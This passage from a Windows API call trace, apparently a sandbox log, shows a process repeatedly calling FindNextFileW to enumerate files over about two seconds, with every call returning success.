hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.668] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.740] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.741] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.971] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.279] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.280] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.301] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.301] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.301] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.307] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.340] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.340] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.340] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.340] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.341] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.513] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.513] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.513] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.513] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.513] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.513] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0108.514] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.289] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.290] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.290] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.290] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.290] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.290] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, 